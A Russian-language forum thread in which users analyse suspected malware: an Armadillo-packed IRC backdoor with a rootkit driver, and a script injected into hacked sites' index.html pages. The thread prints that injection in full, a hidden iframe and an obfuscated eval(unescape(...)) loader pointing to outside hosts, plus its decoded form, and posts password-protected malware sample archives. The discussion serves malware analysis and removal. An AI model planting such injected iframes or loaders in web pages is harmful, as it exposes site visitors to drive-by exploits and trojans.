В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

[HEX]
Так через апач к скрипту и не доберешься...
Но в логах апача с ошибочными запросами нет имени php скрипта :-

А обфусцированные index.html обновляют по нескольку раз в день (наверное к ботику отношения не имеет)

| Сообщение посчитали полезным:

tempread
Так небось в html странице какой нить ифрейм на сплойт ведет. Если сам не можешь разобрать страницу, то упакую и залей, а мы глянем.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

tempread пишет:
улыбнул коментарий внутри: This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.

[HEX] пишет:
Ну раз такой коммент внутри файла, то на 90% что юзают фриварный продукт по шифрованию скриптов.

TrueBug PHP Encoder. Его каммент. Не очень халявный, но снимается действительно за 5 минут. Ломается впрочем тоже.

| Сообщение посчитали полезным:

Посмотрите файл rapidshare.com/files/71414726/kcar.osikcigam.zip
кто может сказать, вредоносный он или нет?

Заранее спасибо.

-----
may all your PUSHes be POPed!

| Сообщение посчитали полезным:

Guru_eXe
Файл явно подозрительный Несмотря даже внутрености запускать яб не стал такое, так как весит 600 кило, а не одного ресурса в файле нет. Да и вирустотал тоже чето не совсем уж радостно красными цветами сигнализирует www.virustotal.com/resultado.html?6ac8ac29093bacfe7b930d844b7e2829

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
запускать яб не стал такое
яб тоже не стал, но за компьютером сиделю любопытные люди... теперь обновляю весь защитный софт, нужно както избавиться от этой заразы, если это вирь конечно. Это не точно, но вроде после запуска этого файла каспер перестал обновляться, пишет, - проверьте подключение, явно чтото нездоровое, поставил каспер поновее, просканил тот файл, каспер промолчал.

-----
may all your PUSHes be POPed!

| Сообщение посчитали полезным:

Guru_eXe
Попробуй под виртуалкой потрейсить малец. В крайнем случае сдампи запущенную прогу и посмотри че там внутри.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
В крайнем случае сдампи запущенную прогу и посмотри че там внутри.
Каспер пишет, что там армадилло. Под виртуалкой нормально не загрузилось, говорит вырубите отладчик (у меня там драйверстудия установлена, хотя не стартует сама), дампнул, если такк можно сказать.. загнал в вирустотал:
Результат: 5/32 (15.63%)
www.virustotal.com/ru/resultado.html?9fd2013b9deec9896227934ea10a14e4
AntiVir передумал и Панда перестала считать его подозрительным.

Дамп дрвеб идентифицировал как BackDoor.IRC.Evil. а на сам процесс никак не реагирует.

add:
по всем характеристикам я подхватил вот это:
forum.kaspersky.com/lofiversion/index.php/t22161.html
у меня также вылазит сообщение о файле ntndis, за одним исключением - там парень пишет, что вирус дабавили в базу, а у меня каспер на этот файл молчит, возможно какято новая модификация, так как архив был стянут с битторрент сети совсем недавно.

-----
may all your PUSHes be POPed!

| Сообщение посчитали полезным:

Велком ту ботнет

-----
Shalom ebanats!

| Сообщение посчитали полезным:

Guru_eXe
судя по логу analysis.seclab.tuwien.ac.at/result.php?taskid=41cc8c1571208954a10a4018c36628f4&refresh=1
очень похоже на Illusion DDoS Bot

| Сообщение посчитали полезным:

UsAr
Угу если судить по логу, то так же напоминает и руткит W32/Forbot-GI www.greatis.com/appdata/d/SysDir/d/drivers_ntndis.sys.htm

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

UsAr, ага, тотже самый ntndis упоминается и в реестре он у меня прописался с такимже путем, только вот операционки у меня на диске C:\ нету =] Самолично я файлы ntndis.exe и ntndis.sys не удалял, мб каспер пошевелился.

SLV пишет:
Велком ту ботнет
надеюсь, что, - прощай навсегда.

add:
надеюсь, что отсутствие этих файлов является подтверждением того, что вируса нет.

-----
may all your PUSHes be POPed!

| Сообщение посчитали полезным:

Guru_eXe

Прожка дропает драйвер, который ставит хуки в SDT.
AVZ+RKU тебя спасут (:

Основная засада для аверов, это то что исходный файл пакован армадиллой.
Сиська известна как BackDoor.IRC.Evil

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx пишет:
Основная засада для аверов, это то что исходный файл пакован армадиллой.
Сиська известна как BackDoor.IRC.Evil
Никакой засады нету, возьмут сигнатуру по криптованому коду и все в ажуре, 5касперский так всевремя делает. или спалят драйвер, а без дрова, толку от бэкдока почти нету.

| Сообщение посчитали полезным:

Черт знает что но льется с xstuff.bz

5d1e_23.11.2007_CRACKLAB.rU.tgz - msntyylh.rar

пароль: vir

| Сообщение посчитали полезным:

WoLFeR

Нифига се не засада...
Сигнатурный поиск отстой. Насмотрелся я уже на такой "ажур", когда на всякие пакеры понаделают маски... Потом еще у авера базы охренительных размеров и он педалит все, как стоп-кран.

Этот троян давно известен, только вот ему жизнь продлили. Не хочу сказать, что в мире есть, что-то идеальное, но к этому, имхо, надо стремиться (:

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Medsft

Наверное чего-то не хватает в этом файлике. Файл архива 603 байта. Падает с ошибкой, в памяти нули.

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Тогда вот так эта хрень дописывается к index.html
разберешься
<iframe src="http://xstuff.biz/tdsko-xyz/out=1194991778" width=1 height=1 frameborder=0><!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2 7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c %69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%37%64%64%64%34%63%37%34%34%35% 33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%7 9%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28 %4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%30%31%31%30%29%2b%27% 32%62%31%65%31%62%32%32%5c%27%20%77%69%64%74%68%3d%37%35%39%20%68%65%6 9%67%68%74%3d%32%39%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79 %3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

| Сообщение посчитали полезным:

window.status='Done';document.write('<iframe name=17ddd4c74453 src='http://x-victory.ru/forum?'+Math.round(Math.random()*220110)+'2b1 e1b22' width=759 height=290 style='display: none'></iframe>')

собстно не похоже на впаривания троя.
P.S. xstuff.bz у меня недосупен.

| Сообщение посчитали полезным:

вот это по моему от него

95a4_23.11.2007_CRACKLAB.rU.tgz - vir.txt

| Сообщение посчитали полезным:

Shad0vv
Еще как похоже!!! Ифрейм смотрящий на х-виктори ведет как раз таки на сплоит под Оперу который стартует говно ихнее. Ну а дальше по старому сценарию.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Medsft

Известен как троян-даунлоадер.агент
Только это реально ни о чем не говорит, словом Агент обзывают всё на свете (:

Файлик тоже битый.

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx
Запускал чтоли? ;) Может специально покорежен файлик чтобы аверы спотыкались.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Styx пишет:
Нифига се не засада...
Сигнатурный поиск отстой. Насмотрелся я уже на такой "ажур", когда на всякие пакеры понаделают маски... Потом еще у авера базы охренительных размеров и он педалит все, как стоп-кран.

Этот троян давно известен, только вот ему жизнь продлили. Не хочу сказать, что в мире есть, что-то идеальное, но к этому, имхо, надо стремиться (:


Ну и иди доказывай свое мнение про сигнатурный поиск в разные конторы.
Я не говорю что сигнатурный поиск рулед, я говрю как работают конторы, и для них никакого гемора для детекта этого троя не будет ни на минуту. Т.к. они одну копию распростроняют, и внесли одну сингнатуру и вся сеть легла.

Вот терь и думай нах напрягатся больше. А твое мнение по поводу "ацтой, неацтой" никого не _бед.

| Сообщение посчитали полезным:

[HEX]
Там с заголовком скорее всего что-то. Пытался запускать (: Винда грит что-то это не прожка, может она 64-х битная.

WoLFeR
Я по конторам ходить не стану, мне это не интересно. Я просто хотел сказать, что более менее сложные упаковщики - проблема для антивирусов (как программ). Антивирус в большинстве своем прожка на которой зарабатывают деньги.

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

<KZ (закодировано) если б все было так просто я б сам их камнями закидал

| Сообщение посчитали полезным:

попробуйте еще вот это внутри почти тоже самое только на 100 байт длинее и пришло под расширением .php
пароль на архив vir

3449_23.11.2007_CRACKLAB.rU.tgz - VIR.RAR

| Сообщение посчитали полезным:

Medsft пишет:
попробуйте еще вот это

drweb сразу ругнулся

VIR.TXT - инфицирован Trojan.Packed.156

| Сообщение посчитали полезным:

Medsft
Гы запускай! analysis.seclab.tuwien.ac.at/result.php?taskid=8361014780a13444956d9f8ccacc4439

Столько сольется всего что потом на всю жизнь хватить анализировать.... хихи

Послание аверам:
Poshel-ka ti na hui drug aver
reva gurd iuh an it ak-lehsoP

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Medsft
Вот исправленый ехе, скорее всего он не докачался:

9098_23.11.2007_CRACKLAB.rU.tgz - vir.rar

мда, опоздал (:
второй vir.exe как раз имеет размер тот что надо

-----
Crack your mind, save the planet

| Сообщение посчитали полезным: